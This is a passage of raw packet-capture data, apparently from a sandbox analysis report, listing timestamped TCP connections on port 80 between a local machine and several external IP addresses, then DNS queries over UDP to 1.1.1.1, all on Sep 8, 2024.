                                                                                                                                                                                                            Sep 8, 2024 09:00:25.778661966 CEST5406380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.778904915 CEST5406380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.783648014 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.855016947 CEST8054061103.224.212.108192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.855201960 CEST8054061103.224.212.108192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.855231047 CEST5406180192.168.2.4103.224.212.108
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.855851889 CEST5406180192.168.2.4103.224.212.108
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.868401051 CEST5406180192.168.2.4103.224.212.108
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.868668079 CEST5151480192.168.2.4199.59.243.226
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.869347095 CEST5406480192.168.2.4199.59.243.226
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.873294115 CEST8054061103.224.212.108192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.873461962 CEST8051514199.59.243.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.874185085 CEST8054064199.59.243.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.874423027 CEST5406480192.168.2.4199.59.243.226
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.874661922 CEST5406480192.168.2.4199.59.243.226
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.879460096 CEST8054064199.59.243.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.124829054 CEST8054062154.85.183.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.125597954 CEST5406280192.168.2.4154.85.183.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.142214060 CEST5406280192.168.2.4154.85.183.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.147435904 CEST8054062154.85.183.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.336908102 CEST8054064199.59.243.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.336926937 CEST8054064199.59.243.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.337069035 CEST5406480192.168.2.4199.59.243.226
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.452591896 CEST8054062154.85.183.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.452661991 CEST5406280192.168.2.4154.85.183.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475111961 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475127935 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475147963 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475161076 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475171089 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475183964 CEST5406380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475187063 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475200891 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475227118 CEST5406380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475239992 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475260973 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475266933 CEST5406380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475275993 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475303888 CEST5406380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475327969 CEST5406380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.481081009 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.481113911 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.481134892 CEST5406380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.481161118 CEST5406380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.481221914 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.481312037 CEST5406380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.573309898 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.573328018 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.573347092 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.573359013 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.573374033 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.573378086 CEST5406380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.573385954 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.573399067 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.573405027 CEST5406380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.573410988 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.573422909 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.573436022 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.573453903 CEST5406380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.573476076 CEST5406380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.574028015 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.574109077 CEST5406380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.669675112 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.669724941 CEST5406380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.743076086 CEST5406580192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.749805927 CEST805406572.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.749869108 CEST5406580192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.750976086 CEST5406580192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.755816936 CEST805406572.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.254600048 CEST805406572.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.254678965 CEST5406580192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.254731894 CEST5406580192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.259641886 CEST805406572.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.403130054 CEST5406680192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.408082962 CEST805406672.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.408160925 CEST5406680192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.408338070 CEST5406680192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.413247108 CEST805406672.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.911478996 CEST805406672.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.911577940 CEST5406680192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.911840916 CEST5406680192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.919960976 CEST805406672.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.962862015 CEST5151680192.168.2.464.225.91.73
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.962956905 CEST5406380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.963076115 CEST5150980192.168.2.415.197.240.20
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.963134050 CEST5150780192.168.2.464.225.91.73
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.963274956 CEST5535780192.168.2.413.248.169.48
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.971204996 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.973545074 CEST805151664.225.91.73192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.973562002 CEST805150915.197.240.20192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.973572016 CEST805150764.225.91.73192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.973583937 CEST805535713.248.169.48192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.973612070 CEST5151680192.168.2.464.225.91.73
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.973676920 CEST5150980192.168.2.415.197.240.20
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.973706007 CEST5150780192.168.2.464.225.91.73
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.973711014 CEST5535780192.168.2.413.248.169.48
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.975107908 CEST5404780192.168.2.4154.212.231.82
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.975174904 CEST6126180192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.980622053 CEST5404480192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.981441975 CEST8054047154.212.231.82192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.981503963 CEST5404780192.168.2.4154.212.231.82
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.981523037 CEST80612613.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.981601000 CEST6126180192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.987040043 CEST8054044208.100.26.245192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.987107992 CEST5404480192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 09:00:36.337066889 CEST8054064199.59.243.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:36.337151051 CEST5406480192.168.2.4199.59.243.226

                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.005814075 CEST4999253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.006629944 CEST5403853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.009535074 CEST5238353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.011212111 CEST6032753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.015980959 CEST53499921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.016293049 CEST6102853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.016896009 CEST6291953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.018695116 CEST53523831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.024175882 CEST53603271.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.026000023 CEST53610281.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.039918900 CEST5198753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.041723967 CEST6475153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.042109013 CEST6384253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.071846962 CEST6479653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.074656963 CEST5361853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.077595949 CEST6360253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.080384016 CEST5939453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.083302975 CEST5779453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.100544930 CEST6403053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.102533102 CEST6068753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.102777958 CEST5441253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.103293896 CEST6358953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.295887947 CEST4935053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.298326969 CEST6120953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.299993038 CEST5935953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.300417900 CEST6160453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.303713083 CEST5157353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.304233074 CEST6023553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.306637049 CEST6076053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.309925079 CEST5754353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.310264111 CEST6308253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.310698032 CEST5178353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.313899994 CEST5666753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.314336061 CEST6281753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.315342903 CEST6532253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.315779924 CEST6404853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.316831112 CEST5536253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.317259073 CEST5455153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.319271088 CEST6260553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.319617033 CEST6311853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.321590900 CEST5055353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.323005915 CEST5174053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.323353052 CEST5241653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.326039076 CEST5191553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.334219933 CEST5942353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.334700108 CEST6239853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.341459036 CEST6079253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.378185034 CEST5592353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.379475117 CEST6317153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.389413118 CEST4945053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.444623947 CEST4962953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.445197105 CEST5397753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.445377111 CEST5853253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.445550919 CEST4988853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.445734024 CEST5183553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.446090937 CEST5386553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.446290970 CEST6369553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.446466923 CEST5230853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.446748972 CEST4998553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.446974993 CEST5794753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.447137117 CEST6148053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.447303057 CEST5021053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.448765993 CEST6346753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.449157000 CEST6466053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.451003075 CEST5385853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.451359987 CEST5848353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.451738119 CEST5603253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.452965021 CEST6215953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.005652905 CEST6291953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.005697966 CEST5403853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.036871910 CEST6475153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.037115097 CEST6384253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.037168980 CEST5198753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.066605091 CEST53629191.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.066627026 CEST53540381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.068929911 CEST6479653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.068963051 CEST5939453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.068994999 CEST6360253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.069335938 CEST5361853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.072314978 CEST53493501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.072325945 CEST53577941.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.072344065 CEST53602351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.072352886 CEST53544121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.072364092 CEST53612091.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.072372913 CEST53640301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.072382927 CEST53519871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.072393894 CEST53575431.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.072402954 CEST53629191.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.072623968 CEST53519871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.074003935 CEST53540381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.074980974 CEST53628171.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.074990034 CEST53653221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075001955 CEST53517831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075392008 CEST53505531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075402975 CEST53524161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075412989 CEST53559231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075423002 CEST53623981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075433969 CEST53640481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075716019 CEST53553621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075725079 CEST53519151.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075733900 CEST53631181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075855017 CEST53646601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075865030 CEST53538581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075875044 CEST53585321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.076025009 CEST53523081.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.076045036 CEST53584831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.076144934 CEST53517401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.076153994 CEST53502101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.076169968 CEST53621591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.076181889 CEST53536181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.078053951 CEST53606871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.078063965 CEST53616041.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.078073978 CEST53607921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.079549074 CEST53515731.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.081099987 CEST53630821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.081832886 CEST53594231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.081970930 CEST53566671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.082115889 CEST53593941.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.082124949 CEST53593941.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.082343102 CEST53494501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.082353115 CEST53614801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.083270073 CEST53631711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.083645105 CEST53560321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.083653927 CEST53634671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.084590912 CEST53539771.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.091716051 CEST53593591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.092248917 CEST53636021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.092328072 CEST53636021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.092456102 CEST53638421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.092516899 CEST53638421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.095597982 CEST53538651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.095750093 CEST53499851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.096220016 CEST53636951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.096256971 CEST53626051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.098947048 CEST53545511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.135119915 CEST6358953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.220824003 CEST53536181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.243684053 CEST53647511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.243731022 CEST53647511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.254376888 CEST53635891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.254395008 CEST53635891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.278597116 CEST53647961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.278606892 CEST53647961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.284437895 CEST53579471.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.302848101 CEST6076053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.305177927 CEST53496291.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.308190107 CEST53518351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.443065882 CEST4988853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.500987053 CEST53498881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.501002073 CEST53498881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.515172005 CEST53607601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.515919924 CEST53607601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.065428019 CEST6511053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.616940022 CEST53651101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.500469923 CEST5395753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.500570059 CEST6307753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.500663996 CEST5376653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.500782013 CEST6346353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.511909008 CEST53539571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.512968063 CEST53634631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.518373013 CEST53630771.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.518522978 CEST53537661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.547883034 CEST5110053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.553045034 CEST5023053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.557250023 CEST53511001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.561888933 CEST53502301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.594664097 CEST5508453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.604087114 CEST53550841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.610730886 CEST5619853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.611857891 CEST5255153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.620193005 CEST53561981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.622580051 CEST53525511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.629679918 CEST5519853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.786416054 CEST6552153192.168.2.41.1.1.1
